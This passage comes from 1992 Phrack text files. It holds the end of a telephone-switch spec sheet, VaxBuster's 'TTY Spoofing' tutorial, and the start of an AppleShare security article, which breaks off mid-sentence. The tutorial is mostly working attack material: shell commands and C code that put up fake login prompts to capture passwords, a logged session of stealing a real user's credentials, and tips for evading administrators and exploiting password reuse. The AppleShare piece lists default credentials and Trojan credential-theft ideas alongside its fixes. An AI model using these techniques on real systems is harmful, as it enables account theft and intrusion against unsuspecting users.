  3592. TRK         Trunks
  3593.  
  3594.             DTRK - Digital Trunks
  3595.             TRK  - Analog or digital recorded announcement trunks
  3596.  
  3597. TRNS        Translations
  3598.  
  3599.             ADDR - Address translations
  3600.             EBSP - EBS prefix translations
  3601.             ESAP - Emergency Stand-Alone prefix
  3602.             PRFX - Prefix translations
  3603.             SCRN - Screening translations
  3604.  
  3605.  
  3606. V. SPEC SHEET
  3607.  
  3608. Maximum # Subscriber Lines:            10,800
  3609.      (in stand-alone mode)
  3610.  
  3611. Maximum # Trunks:                       3,408
  3612.      - Incoming Trunk Groups:             127
  3613.      - Outgoing Trunk Groups:             127
  3614.      - Two-way Trunk Groups:              127
  3615.      - Maximum Routes:                    512
  3616.      - Maximum Trunks per Group:          255
  3617.  
  3618. Directory Numbers:                     16,000
  3619.  
  3620. Office Codes:                               8
  3621.  
  3622. Home Numbering Plan Area:                   4
  3623.  
  3624. Thousands Groups:                          64
  3625.  
  3626. Number of Network Groups:              1 or 2
  3627.  
  3628. Total Network Capacity:
  3629.     - One Network Module:               5,400 POTS lines + 600 trunks
  3630.     - Two Network Module:              10,800 POTS lines + 1,200 trunks
  3631.  
  3632. Traffic
  3633.      - Busy Hour Calls                 38,000
  3634.      - Average Busy Season             29,000
  3635.          Busy Hour Attempts
  3636.      - CCS per line                      5.18 centi call seconds
  3637.      - CCS per trunk                     27.0 centi call seconds
  3638.      - Total CCS                      133,000 centi call seconds
  3639.  
  3640. Outpulsing                    DP, MF, or DTMF
  3641.  
  3642. Inpulsing
  3643.      - Trunks                 DP, MF, or DTMF
  3644.      - Lines                       DP or DTMF
  3645.  
  3646. Register Capacity
  3647.      - Outgoing                  DP=16 digits
  3648.                                DTMF=16 digits
  3649.                                  MF=14 digits+KP+ST
  3650.                             LEAS MF=20 digits+KP+ST
  3651.                              [LEAS Route Access]
  3652.  
  3653.      - Incoming                  DP=14 digits
  3654.                                DTMF=16 digits
  3655.                                  MF=14 digits
  3656.  
  3657.  
  3658. VI. LIMITED GLOSSARY
  3659.  
  3660. DP - Dial Pulse.  A form of signaling that transmits pulse trains to indicate
  3661.      digits.  Slow compared to DTMF and MF.  Made obsolete by DTMF.  Old
  3662.      step-by-step switches use this method, and there are still quite a few
  3663.      subscriber lines that use DP, even though DTMF is available.
  3664.  
  3665. In-band Signaling - Transmitting control signals in the 300 - 3300 hz voice
  3666.                     band, meaning that they're audible to subscribers.
  3667.  
  3668. Out-of-band Signaling - Transmitting control signals above or below the 300 -
  3669.                         3300 hz voice band.  See SS7, CCS7.
  3670.  
  3671. DTMF - Dual Tone Multi-Frequency.  A form of in-band signaling that transmits
  3672.        two tones simultaneously to indicate a digit.  One tone indicates the
  3673.        row and the other indicates a column.  A fast, technically simple way of
  3674.        dialing that is in use almost all over the United States.  White boxes
  3675.        generate DTMF tones, a.k.a. "Touch Tones" or Digitones.  See DP, MF.
  3676.  
  3677. MF - Multi-frequency.  A form of in-band signaling similar to DTMF, except the
  3678.      signals are encoded differently (i.e., the row and column tones are
  3679.      different, because the keypad for MF tones isn't laid out in a rectangular
  3680.      matrix).  These are the "operator tones."  Blue boxes generate these
  3681.      tones. See DTMF, In-band signaling.
  3682.  
  3683. CCS7 - Common Channel Signaling 7.  Part of the Signaling System 7
  3684.        specification, CCS7 transmits control signals either above or below the
  3685.        voice band to control switch equipment, so control signals may be
  3686.        transmitted simultaneously with voice.  See SS7.
  3687.  
  3688. SS7 - Signaling System 7.  An inter-switch signaling protocol developed by
  3689.       Bellcore, the RBOCs' research consortium.  Relatively new, this protocol
  3690.       can be run only on digital switches. See CCS7, CLASS.
  3691.  
  3692. CLASS - Custom Local Area Signaling Services.  Several subscriber-line features
  3693.         that are just being introduced around the United States at the time of
  3694.         this article.  See SS7, CCS7.
  3695.  
  3696. Centrex - A scheme that turns a switch into an off-site PBX for business users.
  3697.           It can usually co-exist with existing lines.
  3698.  
  3699.  
  3700. If anyone has any more questions, contact me at WWIVNet THE CAVALIER@3464.
  3701.  
  3702. Thanks to Northern Telecom (the nicest sales staff in the world of switch
  3703. manufacturers, with a killer product to boot!), Pink Flamingo, Taran King,
  3704. Grim, and the crew who supported the NFX in "days of yore."
  3705. _______________________________________________________________________________
  3706.  
  3707.                                 ==Phrack Inc.==
  3708.  
  3709.                    Volume Four, Issue Forty-One, File 8 of 13
  3710.  
  3711.                           ++++++++++++++++++++++++++++
  3712.                     +++++++                          +++++++
  3713.                     +++++++       TTY SPOOFING       +++++++
  3714.                     +++++++                          +++++++
  3715.                      ++++++            BY            ++++++
  3716.                       +++++                          +++++
  3717.                         +++         VaxBuster        +++
  3718.                          ++                          ++
  3719.                           ++++++++++++++++++++++++++++
  3720.  
  3721.                                  July 16, 1992
  3722.  
  3723.  
  3724.      Please note that this file is ONLY to be distributed as part of Phrack,
  3725. and will NOT be distributed to any other person or magazine for release.
  3726.  
  3727.      More detailed instructions have been provided so that the novice hacker is
  3728. able to understand them; therefore, all experienced hackers should be able to
  3729. breeze right through this without having to worry about the specific command
  3730. syntax provided.
  3731.  
  3732.      On UNIX systems, there are many ways to obtain account names and
  3733. passwords.  Some hackers prefer to swipe the password file and run programs
  3734. like Crack and Killer Cracker on them in order to get account names and
  3735. passwords.  Others rely on bugs or holes in the system in order to gain root
  3736. access.  Both these methods work, but what do you do if your password file is
  3737. shadowed (and it is NOT a yellow pages file!)?  And what do you do if all the
  3738. holes have been patched over from years of previous hackers abusing them? Well,
  3739. I happen to have found a system where all this is true.  I have even allowed
  3740. hackers to use one of my accounts to try to gain root privs, and of the 10 or
  3741. so that have tried, they have all failed.  My only recourse was to find SOME
  3742. other way to get accounts on the system to maintain MY security.
  3743.  
  3744.      TTY spoofing is often looked at as being lame, and some don't even
  3745. consider it a "hacking technique."  People usually completely overlook it, and
  3746. many others don't even know about it, or know HOW to do it.  I suppose I should
  3747. start out by defining the term.  TTY spoofing is either installing a Trojan
  3748. horse type program to sit and watch a certain (or multiple) tty and wait for a
  3749. user to login.  Instead of getting the normal system prompt, the program YOU
  3750. installed echoes the standard "login:" prompt, and then after they type in
  3751. their username, it prompts them for "<username> password:" and boom, you have a
  3752. new account.  This can be done by a program or, in many cases, manually.
  3753.  
  3754.      Of all the people I know, 90 percent of them scream at me saying that this
  3755. is impossible because their system doesn't allow read/write access to the tty.
  3756. When I make references to tty, I mean the physical device filename or
  3757. /dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters
  3758. (e.g., 03, pa, p4 are all valid).  Of all the systems I've been on, I've never
  3759. seen one that doesn't allow reading/writing to a LOGIN process.  See, the
  3760. system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND
  3761. PASSWORD HAS BEEN VERIFIED.  Console, or ttyco, is an exception where the perms
  3762. are ALWAYS -rw------.
  3763.  
  3764.      Now that you know WHAT tty spoofing is and the general idea behind WHY it
  3765. works, I'll start to tell you the many ways it can be done.
  3766.  
  3767.      In order to tty spoof, you MUST have at least ONE valid account on the
  3768. system.  You can obtain the account via a little social engineering, or you
  3769. could try a /who *sitename in the IRC to get nicknames and use their username
  3770. and try to hack out the password.  Try looking for users in #hottub and other
  3771. st00pid channels because they are the ones who would tend to have the easy
  3772. passwords.  Or use any other method that you can think of to obtain an account.
  3773.  
  3774.      Once you have an account, the rest is the easy part.  Simply create a
  3775. script in vi or emacs that redirects input from UNUSED tty's to cat.  Since you
  3776. are cat's standard output, everything coming FROM the monitored tty will come
  3777. to your screen.  You probably want to watch about 10 or 15 terminals.  An
  3778. example script would be:
  3779. cat </dev/tty01&
  3780. cat </dev/tty02&
  3781. cat </dev/ttypa&
  3782. cat </dev/ttyp1&
  3783.  
  3784.      Then you want to just run your script with source.  Once a user walks up
  3785. to a terminal (or remotely logs in via telnet, etc.), they will try to press
  3786. return and attempt to get a login prompt.  Many users will also type their
  3787. username, thinking that the system is just waiting for it.  Make sure you write
  3788. down the username.  After a while, they will probably start pressing control
  3789. characters, like control-d or z or whatever.  Here's the problem:  when CAT
  3790. encounters the ^D, it thinks that it is receiving an EOF in the file and it
  3791. thinks its job is done.  You'll get something to the effect of:
  3792.  
  3793. [2] Exit           DONE                        cat </dev/tty01
  3794.  
  3795. or
  3796.  
  3797. [2] Exit 1         cat:i/o error               cat </dev/tty01
  3798.  
  3799. You want to IMMEDIATELY (if not sooner) "recat" that terminal.  Once you get
  3800. that DONE signal, you now know WHAT terminal is active.  You want to then type
  3801. something to the effect of 'echo -n "login:" >/dev/tty01&'.  The & is important
  3802. because if the user decided to switch terminals, echo could lock up and freeze
  3803. your control on the account.  If after about 10 seconds echo doesn't come back
  3804. as:
  3805.  
  3806. [5] Exit            DONE                        echo -n login: >/dev/tty01
  3807.  
  3808. KILL the process.  When you ran the echo command, the shell gave you a
  3809. processid.  Just type KILL processid.  If the done echo line DOES come back,
  3810. that means that it was successfully printed on the user's screen.  He will then
  3811. type in his username.  WRITE THIS DOWN.  If you are ever in doubt that the word
  3812. on your screen is a username, type 'grep word /etc/passwd' and if a line comes
  3813. up, you know it's valid.  If grep doesn't return anything, still keep it
  3814. because it might be a password.  Then wait about 2 seconds, and type
  3815. 'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
  3816. lockage.  If that command doesn't come back in about 10 seconds, kill the
  3817. process off and you can assume that you lost the user (e.g. he moved to another
  3818. terminal).  If the done echo line DOES come back, then in about 2 seconds, you
  3819. SHOULD see his password come up.  If you do, write it down, and boom, you have
  3820. a new account.
  3821.  
  3822.      This may seem like a time consuming process and a lot of work, but
  3823. considering that if you have macros with the "cat </dev/tty" command and the
  3824. echo -n commands preset, it will be a breeze.  Okay - so you say to yourself,
  3825. "I'm a lazy shit, and just want passwords to be handed to me on a silver
  3826. platter."  With a little bit of work, you can do that!  Below is a few lines of
  3827. C source code that can be used to automate this process.  Anyone who knows C
  3828. should be able to put something together in no time.
  3829.  
  3830. #include <stdio.h>
  3831.  
  3832. FILE *fp, *fp2;
  3833. char username[10], password[10];
  3834.  
  3835. main()
  3836. {
  3837.       fp=fopen("/dev/ttyp1", "r");
  3838.       fp2=fopen("/dev/ttyp1", "w");
  3839.  
  3840.       fprintf(fp2, "login:");
  3841.       fscanf(fp, "%s", &username);
  3842.  
  3843.       /* Put delay commands in here */
  3844.  
  3845.       fprintf(fp2, "%s password:", username);
  3846.       fscanf(fp, "%s", @password);
  3847.  
  3848.       printf("Your new account info is %s, with password %s.", username,
  3849.                 password);
  3850. }
  3851.  
  3852.      This is a VERY basic setup.  One could fairly easily have the program take
  3853. arguments from the command line, like a range of tty's, and have the output
  3854. sent to a file.
  3855.  
  3856.      Below is an actual session of manual tty spoofing.  The usernames and
  3857. passwords HAVE been changed because they will probably be active when you read
  3858. this.  Some c/r's and l/f's have been cut to save space.  Please notice the
  3859. time between the startup and getting a new account is only seven minutes.
  3860. Using this technique does not limit the hacked passwords to dictionary
  3861. derivatives like Crack and other programs.
  3862.  
  3863. source mycats                              ; This file contains cats
  3864.                                     ; for terminals tty03 - tty10
  3865. [1] 29377
  3866. /dev/tty03: Permission denied       ; All this means is that someone is logged
  3867. in
  3868.                                 ; and has their mesg set to NO.  Ignore it.
  3869.  
  3870. [1]    Exit 1               cat < /dev/tty03
  3871. [2] 29378
  3872. [3] 29379
  3873. /dev/tty06: Permission denied
  3874. /dev/tty05: Permission denied
  3875. [4]    Exit 1               cat < /dev/tty06
  3876. [3]    Exit 1               cat < /dev/tty05
  3877. /dev/tty07: Permission denied
  3878. [3]    Exit 1               cat < /dev/tty07
  3879. /dev/tty08: Permission denied
  3880. [3]    Exit 1               cat < /dev/tty08
  3881. [2]  + Stopped (tty input)    cat < /dev/tty04      ;This was the terminal I
  3882. was
  3883.                                                 ;on - it's automatically
  3884.                                     ;aborted...
  3885. [3] 29383
  3886. <5:34pm><~> /dev/tty09: Permission denied
  3887. [3]    Exit 1               cat < /dev/tty09
  3888. <5:34pm><~> source mycats2                  ;This one contains 34 - 43
  3889.  
  3890. [3] 29393
  3891. [4] 29394
  3892. [5] 29395
  3893. [6] 29396
  3894. [7] 29397
  3895. [8] 29398
  3896. [9] 29399
  3897. /dev/tty36: Permission denied
  3898. /dev/tty37: Permission denied
  3899. /dev/tty38: Permission denied
  3900. /dev/tty39: Permission denied
  3901. /dev/tty40: Permission denied
  3902. /dev/tty34: Permission denied
  3903. /dev/tty35: Permission denied
  3904.  
  3905. [9]    Exit 1               cat < /dev/tty40
  3906. [8]    Exit 1               cat < /dev/tty39
  3907. [7]    Exit 1               cat < /dev/tty38
  3908. [6]    Exit 1               cat < /dev/tty37
  3909. [5]    Exit 1               cat < /dev/tty36
  3910. [4]    Exit 1               cat < /dev/tty35
  3911. [3]    Exit 1               cat < /dev/tty34
  3912.  
  3913. [1] 29400
  3914. [3] 29401
  3915. [4] 29402
  3916.  
  3917. <5:34pm><~> /dev/tty41: Permission denied
  3918.  
  3919. [1]    Exit 1               cat < /dev/tty41
  3920. /dev/tty43: Permission denied
  3921. [4]    Exit 1               cat < /dev/tty43
  3922. /dev/tty42: Permission denied
  3923. [3]    Exit 1               cat < /dev/tty42
  3924.  
  3925. <5:34pm><~> source mycats3                        ;This contains p1-pa
  3926.  
  3927. [3] 29404
  3928. [4] 29405
  3929. [5] 29406
  3930. [6] 29407
  3931. [7] 29408
  3932. /dev/ttyp1: Permission denied
  3933. /dev/ttyp3: Permission denied
  3934. /dev/ttyp5: Permission denied
  3935. /dev/ttyp6: Permission denied
  3936.  
  3937. [8]    Exit 1               cat < /dev/ttyp6
  3938. [7]    Exit 1               cat < /dev/ttyp5
  3939. [5]    Exit 1               cat < /dev/ttyp3
  3940. [3]    Exit 1               cat < /dev/ttyp1
  3941. [7] 29410
  3942. [8] 29411
  3943. [9] 29412
  3944. [1] 29413
  3945.  
  3946. <5:34pm><~> /dev/ttyp7: Permission denied
  3947.  
  3948. [7]    Exit 1               cat < /dev/ttyp7
  3949. /dev/ttypa: Permission denied
  3950. [1]    Exit 1               cat < /dev/ttypa
  3951.  
  3952. <5:34pm><~> source mycats4                         ;Last one is q0-qa
  3953.  
  3954. [1] 29426
  3955. [3] 29427
  3956. [5] 29428
  3957. [7] 29429
  3958. [10] 29430
  3959. [11] 29431
  3960. /dev/ttyq5: Permission denied
  3961.  
  3962. [10]   Exit 1               cat < /dev/ttyq5
  3963. [12] 29432
  3964. [10] 29433
  3965. [13] 29434
  3966. [14] 29435
  3967. <5:34pm><~> who
  3968.  
  3969. <5:34pm><~> nnnnnnnnrlogin unx        ; He thought he didn't type it right.
  3970. pigsnort                                ; Important!  Write down ALL non-
  3971.                               ; system sent messages!
  3972. <5:35pm><~>
  3973. grep pigsnort /etc/passwd               ; Check with grep to see if it's an
  3974.                               ; account.
  3975.  
  3976. <5:35pm><~>                             ; Didn't return anything - must be a
  3977.                               ; a password!
  3978.  
  3979. nnnpptst8                               ; Sure looks like an account name to
  3980. nnnnn=====                              ; me!  Write it down!
  3981.  
  3982. ls
  3983.  
  3984. [8]    Done                   cat < /dev/ttyp8  ; Asshole pressed control-d.
  3985.                                     ; 'recat' the terminal!
  3986.  
  3987. <5:36pm><~> cat  < /d e v/  ttyp8&             ; This is the 'recat.'
  3988.  
  3989. [8] 29459
  3990. <5:36pm><~> cat: read error: I/O error            ; Asshole is now trying all
  3991.                                     ; sorts of control characters
  3992.                                     ; sending UNIX into a fit.
  3993. [4]    Exit 1               cat < /dev/ttyp2
  3994.  
  3995. <5:36pm><~> cat </dev/ttyp2&                  ; 'recat' it!
  3996.  
  3997. [4] 29465
  3998. <5:36pm><~>
  3999.  
  4000. <5:36pm><~>
  4001.  
  4002. [6]    Done                   cat < /dev/ttyp4  ; Someone had to press the
  4003.                                                 ; character, so this is active.
  4004.  
  4005. <5:36pm><~> cat </dev/ttyp4&                  ; 'recat' the ctrl-d.
  4006.  
  4007. [6] 29468
  4008. <5:36pm><~> echo -n "login:" >/dev/ttyble1      ; Try echo'ing a fake login
  4009. cat: read error: I/O error                  ; to the active terminal.
  4010.  
  4011. [6]    Exit 1               cat < /dev/ttyp4
  4012. poop4d                                          ; Here goes another password.
  4013. p4                                              ; Couldn't find the matching
  4014. &                                    ; account.
  4015.  
  4016. [6] 29470
  4017. <5:37pm><~> cat: read error: I/O error
  4018.  
  4019.  
  4020. [4]    Exit 1               cat < /dev/ttyp2
  4021.  
  4022.  
  4023. <5:37pm><~> cat </dev/ttyp2&
  4024.  
  4025. [4] 29489
  4026. <5:37pm><~> echo -n "login:" >/dev/ttyp2&      ; Try echo'ing a fake login
  4027.                                     ; prompt again.
  4028. [15] 29490
  4029. <5:37pm><~> kill 29490                        ; Login prompt didn't return
  4030.                                     ; within a few seconds so we
  4031.                                                 ; kill it.
  4032.  
  4033. [15]   Terminated             echo -n login: > /dev/ttyp2
  4034. <5:37pm><~> cat </dev/tty
  4035. echo -n "login:" >/dev/ttyp4&
  4036.  
  4037. [15] 29491
  4038. <5:38pm><~> kill 29491
  4039.  
  4040. <5:38pm><~> grep pptst8 /etc/passwd             ; Make sure it's an account!
  4041.  
  4042. pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
  4043. <5:38pm><~> grep ble1 /etc/passwd               ; This isn't an account...
  4044.  
  4045. <5:39pm><~> grep poop4d /etc/passwd             ; Neither is this - probably
  4046.                                     ; a password...
  4047.  
  4048. <5:39pm><~> who                              ; See if any of the users we
  4049.                                     ; caught fell through an
  4050.                                     ; 'uncatted' terminal...
  4051.  
  4052. <5:39pm><~> ps -x                               ; View all our processes.
  4053.                                     ; DAMN glad that the cat's
  4054.   PID TT STAT  TIME COMMAND                     ; don't come up in the process
  4055. 29266 04 S     0:04 -tcsh (tcsh)            ; list!
  4056. 29378 04 T     0:00 cat
  4057. 29412 04 I     0:00 -tcsh (tcsh)
  4058. 29426 04 I     0:00 -tcsh (tcsh)
  4059. 29427 04 I     0:00 -tcsh (tcsh)
  4060. 29428 04 I     0:00 -tcsh (tcsh)
  4061. 29429 04 I     0:00 -tcsh (tcsh)
  4062. 29431 04 I     0:00 -tcsh (tcsh)
  4063. 29432 04 I     0:00 -tcsh (tcsh)
  4064. 29433 04 I     0:00 -tcsh (tcsh)
  4065. 29434 04 I     0:00 -tcsh (tcsh)
  4066. 29435 04 I     0:00 -tcsh (tcsh)
  4067. 29459 04 I     0:00 -tcsh (tcsh)
  4068. 29470 04 D     0:00 <exiting>
  4069. 29489 04 I     0:00 -tcsh (tcsh)
  4070. 29491 04 D     0:00 -tcsh (tcsh)
  4071. 29547 04 R     0:00 ps -x
  4072. <5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
  4073.  
  4074. 435 29459 29470 29489 289491                    ;Kill off all processes.
  4075.  
  4076. 29470: No such process
  4077.  
  4078. [4]    Terminated             cat < /dev/ttyp2
  4079. [8]    Terminated             cat < /dev/ttyp8
  4080. [14]   Terminated             cat < /dev/ttyqa
  4081. [13]   Terminated             cat < /dev/ttyq9
  4082. [10]   Terminated             cat < /dev/ttyq8
  4083. [12]   Terminated             cat < /dev/ttyq7
  4084. [11]   Terminated             cat < /dev/ttyq6
  4085. [7]    Terminated             cat < /dev/ttyq4
  4086. [5]    Terminated             cat < /dev/ttyq3
  4087. [3]    Terminated             cat < /dev/ttyq2
  4088. [1]    Terminated             cat < /dev/ttyq1
  4089. [9]    Terminated             cat < /dev/ttyp9
  4090. [2]    Terminated             cat < /dev/tty04
  4091.  
  4092. <5:41pm><~>
  4093.  
  4094. [15]   Terminated             echo -n login: > /dev/ttyp4
  4095. [6]    Done                   echo -n login: > /dev/ttyp4
  4096.  
  4097. <5:41pm><~> ps -x
  4098.  
  4099.   PID TT STAT  TIME COMMAND
  4100. 29266 04 S     0:04 -tcsh (tcsh)
  4101. 29594 04 R     0:00 ps -x
  4102. <5:41pm><~> logout
  4103.  
  4104. Local -011- Session 1 disconnected from UNIX1
  4105.  
  4106. Local> c unx                                    ; Notice it's a different
  4107.                                                 ; system but shares passwords.
  4108. Local -010- Session 1 to UNX on node MYUNX established
  4109.  
  4110. Welcome to ucuc.edu.
  4111.  
  4112. login: ble1                                     ; Test out all the accounts
  4113. ble1 password:  [I tried poop4d]                ; with all the passwords.
  4114. Login failed.
  4115. login: pptst8
  4116. pptst8 password: [I tried poop4d here too.]
  4117. Login failed.
  4118. login: pptst8
  4119. pptst8 password: [I typed pigsnort]
  4120. Authenticated via AFS Kerberos.                 ; BINGO!  We're in!
  4121. Checking system rights for <pptst8>... login permitted.
  4122. login 1.0(2), Authen
  4123. Last login: Fri Jul 17 17:33:30 on tty11
  4124.  
  4125. (1) unix $ ls                                   ; Let's see what this sucker
  4126.                                                 ; has...hmm...an IRC user, eh?
  4127. Mail      Mailbox      News      bin      irc      other      junk      private
  4128. public
  4129. (2) unix $ logout
  4130.  
  4131. Local -011- Session 1 disconnected from UNX
  4132.  
  4133.      A few words of advice:  Monitor the tty's when it's the busiest time of
  4134. the day, usually about 11am on a university system.  Kill all your processes
  4135. before you hang up.  Those processes that you run will sit on the system and
  4136. can be found by sysadmins.  Also, they will tie up those tty's that you are
  4137. monitoring, which can also cause problems.  Point is, you DON'T want to attract
  4138. attention to what you're doing.  Don't test the accounts you get immediately.
  4139. If the victim happens to be doing a 'who' and sees two of himself, he is going
  4140. to shit.  Wait until later or use a different subsystem that won't show up on
  4141. his 'who'.
  4142.  
  4143. Don't take over accounts.  All the real user has to do is call up the office
  4144. and tell them that their password was changed.  In two seconds, it'll be
  4145. changed back, plus the sysadmin will be on the lookout so you're just one step
  4146. BEHIND where you started.  Once you have someone's account info, kill the cat
  4147. that is sucking the terminal so that the user can log in normally.  If he
  4148. continues not to get ANYTHING, he may go and solicit some "professional" help,
  4149. and THEY might know what's going on, so let the sucker log in.  Another thing:
  4150. with accounts you get.
  4151.  
  4152. DO NOT DESTROY ANYTHING in the system, not in their account, and no where else
  4153. if you get higher privs.  Chances are that the person is NOT going to know
  4154. someone has obtained their password, and will have NO reason to change it.
  4155. Wait until his college term/semester ends and then monitor the file dates.  If
  4156. after about a month the dates don't change, change the password and do whatever
  4157. you want to the account because he's probably done with it.
  4158.  
  4159. Oh and one last thing.  Once you have a valid account, grep the username and
  4160. get the REAL name.  Then grep the REAL name and find out all accounts on the
  4161. system that the guy owns.  Chances are that he is using the same password in
  4162. multiple accounts!
  4163.  
  4164. Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
  4165. for putting out an excellent magazine over the years.
  4166.  
  4167. If you need to contact me, try the IRC in #hack and the VMB world.  I usually
  4168. prefer NOT to be contacted by e-mail, but if you have my address and have an
  4169. important question, go for it.  I'm willing to help any beginners who need it.
  4170.  
  4171. Happy Hacking!
  4172.  
  4173. VaxBuster '92
  4174. _______________________________________________________________________________
  4175.  
  4176.                                 ==Phrack Inc.==
  4177.  
  4178.                    Volume Four, Issue Forty-One, File 9 of 13
  4179.  
  4180. - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
  4181.  
  4182.                   Security Shortcomings of AppleShare Networks
  4183.  
  4184.                                  By Bobby Zero
  4185.  
  4186.                                November 28, 1992
  4187.  
  4188. - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
  4189.  
  4190.         The purpose of this file is to inform all those underpaid Mac network
  4191. administrators or other interested parties of the problems with Macintosh
  4192. AppleShare and how to address those problems.  AppleShare is quite respectable
  4193. in both its implementation and usage, blending seamlessly with the Macintosh OS
  4194. such that the casual user has no idea of the complexity behind the elegance.
  4195. For all its elegance, however, it does have some severe drawbacks in terms of
  4196. security-- nearly all of which are fixable, requiring a combination of common
  4197. sense and RTFM:  Read The Fucking Manual.
  4198.  
  4199.         This is in no way to be considered as a "How To" for persons of
  4200. questionable ethics and/or motives.  That being said, however, I feel the
  4201. following is in order:
  4202.  
  4203. PROSECUTOR:  [To WITNESS] ...And you are?
  4204.  
  4205. WITNESS:  Miss America.
  4206.  
  4207. [Singing]
  4208.  
  4209. PROSECUTOR:  Would you please tell the court why you feel Fielding Mellish is a
  4210. traitor to this country?
  4211.  
  4212. WITNESS:  I feel that Fielding Mellish is a traitor to this country because his
  4213. views are different from the views of the President, and others of his kind.
  4214. Differences of views should be tolerated, but not when they are too different.
  4215. Then he becomes a subversive mother.
  4216.  
  4217.                                       -- Woody Allen, "Bananas"
  4218.  
  4219.  
  4220.         This file is divided into 5 sections:  (1) the "AppleShare Prep" file,
  4221. (2) the "AShare File Srv" application, (3) Mixing VAXens & AppleShare, (4)
  4222. System 7 FileSharing, and (5) NCSA Telnet weaknesses. The fifth does not
  4223. particularly relate to AppleShare, but its security can be exploited via method
  4224. #4, so I thought to include it.
  4225.         If there is sufficient interest, I will make a "Part II" [or three or
  4226. four or five..] detailing more problems.  Send feedback to Phrack Loopback;
  4227. being a regular reader, I will respond accordingly.  While writing this, I was
  4228. unsure of the approach -- either bland technical or "gh0d-these-people-
  4229. are-dumb" statements.  I decided to just combine them, chao-like.  Well, enough
  4230. of my rambling.  On with the file!
  4231.  
  4232.  
  4233.                                - = - = - = - = -
  4234.  
  4235.  
  4236. THE "APPLESHARE PREP" FILE
  4237. ~~~  ~~~~~~~~~~ ~~~~  ~~~~
  4238. (1) The "AppleShare Prep" file under both System 6 and 7 contains a BMLS
  4239. resource; this resource contains various information required to mount a volume
  4240. on startup.  While this is an optional feature, many people choose it either by
  4241. accident or for convenience.
  4242.  
  4243. * The downside to this convenience is the fact that the user's name and
  4244. password for a server are stored in this file.  Anyone with a copy of ResEdit
  4245. can open this file up, and view the BMLS resource.
  4246.  
  4247. * It's so easy to create a Trojan horse and slip it into a program or Hypercard
  4248. stack to copy the BMLS resource from the target's AppleShare Prep file and copy
  4249. it into a hidden file on the server drive where it can be retrieved at a later
  4250. date.  If Mr. Ed is well-written, he would be nearly undetectable as it takes
  4251. but an eyeblink to copy the rez.  Trojan horses aren't as sexy as viruses and
  4252. don't get much publicity, but it is exceedingly easy to fool a Macintosh user
  4253. [or any user, for that matter] into running something he or she shouldn't.
  4254.  
  4255. HOW TO SOLVE:  Educate users of this flaw and urge them to log into the file
  4256. server manually.  If computers in an open lab setting are used, configure them
  4257. to automatically log in as a guest, thereby circumventing the entire issue of
  4258. passwords entirely.  Encryption of the BMLS resource is entirely up to Apple or
  4259. someone with enough knowledge of AppleShare to write a patch -- certainly not
  4260. me [yet...].
  4261.  
  4262.  
  4263. THE "ASHARE FILE SRV" SERVER
  4264. ~~~  ~~~~~~ ~~~~ ~~~  ~~~~~~
  4265. (2) On AppleShare File Servers running v2.0:
  4266.  
  4267. * The file "Users & Groups" within the Server/System Folder contains the data
  4268. required for maintaining folder privileges & ownership.  It also contains
  4269. user's names and passwords, in an unencrypted format.  While obtaining this
  4270. file would be somewhat difficult [one must physically be able to access the
  4271. server:  shut it down, restart it with a floppy, copy the file, reboot the
  4272. machine], the "rewards" would be considerably worthwhile, as one would now have
  4273. a copy of every user name and password, including that of the Administrator.
  4274. Once physical access is secured, one could conceivably write a program to
  4275. install on the server that would periodically make a copy of the file and put
  4276. it on the "server" side of the disk, and give it an innocuous name... an INIT
  4277. which would perform on every startup, or install a Time Task to do it daily, or
  4278. even going so far as to patch the AppleShare Admin program to update this file
  4279. every time a user is added or modified.  It is also common knowledge that users
  4280. use the same passwords on different machines; armed with a list of names &
  4281. passwords for one machine, one could then enter another computer with the same
  4282. user/pass combination.
  4283.  
  4284. * There is no automatic lockout for users who enter an incorrect password. With
  4285. a bit o' knowledge and a copy of "Inside AppleTalk," a program could be written
  4286. that could use a dictionary of common passwords in conjunction with a list of
  4287. user names to try to manually "hack out" a valid user/password combination.
  4288. The speed of this varies greatly on the speed of and load on the server, the
  4289. speed of and load on the network, and the speed of the "attacking" computer.  A
  4290. typical "hack" can take anywhere from .5 to 5 seconds, but there is no need to
  4291. tie up the attacking computer for that period of time; the program can use both
  4292. asynchronous AFPCommand calls and exist under Multifinder to allow for complete
  4293. "background hacking."  It should be noted, however, that Apple has incorporated
  4294. a lockout into the hideously overpriced AppleShare 3.0 -- its hardware
  4295. requirements, however, seem to leave it out of the budgets of most sane
  4296. individuals.
  4297.  
  4298. * A group of individuals armed with the above program could go into a computer
  4299. lab, fire up said program, and then launch a word processing application and
  4300. seem to be doing homework while in reality they would be hacking passwords.
  4301.  
  4302. * The "Copy Protect File" in AppleShare Admin disallows using the Finder to
  4303. copy a "Protected" program.  That does not deter, however, a "normal" copy
  4304. program such as DiskTop from copying the file.  [That is about as lame as the
  4305. ol' "Bozo Bit."]
  4306.  
  4307. HOW TO SOLVE:  Insure that physical access to the fileserver is impossible for
  4308. all but trusted persons.  Upgrade to AppleShare 3.0 [$$ gag $$], which allows
  4309. "locking" of accounts after a certain number of bad attempts, or obtain a
  4310. logging program to keep track of invalid attempts and origins, then track down
  4311. the offenders.  There's no way to stop the violation of the "Copy Protection"
  4312. -- it deters only those easily dismayed.  All I can suggest is you keep your
  4313. non-PD programs away from Guests or other "non-trusted" persons.
  4314.  
  4315.  
  4316. VAXSHARE, PCLINK, AND OTHER VAX/APPLESHARE SERVER APPS
  4317. ~~~~~~~~~ ~~~~~~~ ~~~ ~~~~~ ~~~ ~~~~~~~~~~ ~~~~~~ ~~~~
  4318. (3) There are various forms of AppleShare that can be run from a VAX; many
  4319. versions of these programs have severe flaws which can also be exploited.
  4320.  
  4321. * The prime example is the existence of "default" accounts:  while "Guest"
  4322. logins might be disallowed, logging in as DEFAULT, password USER has been known
  4323. to be effective in "getting in" -- even FIELD, SERVICE has worked.  Pathetic,
  4324. isn't it, that these guys haven't picked up on these things?
  4325.  
  4326. * The existence of a VAXShare [or similar] account used for AppleShare access
  4327. can oft times be used to access the VAX.  For instance, if one is aware that a
  4328. VAX is being used in an open lab as an AppleShare File Server, one can use
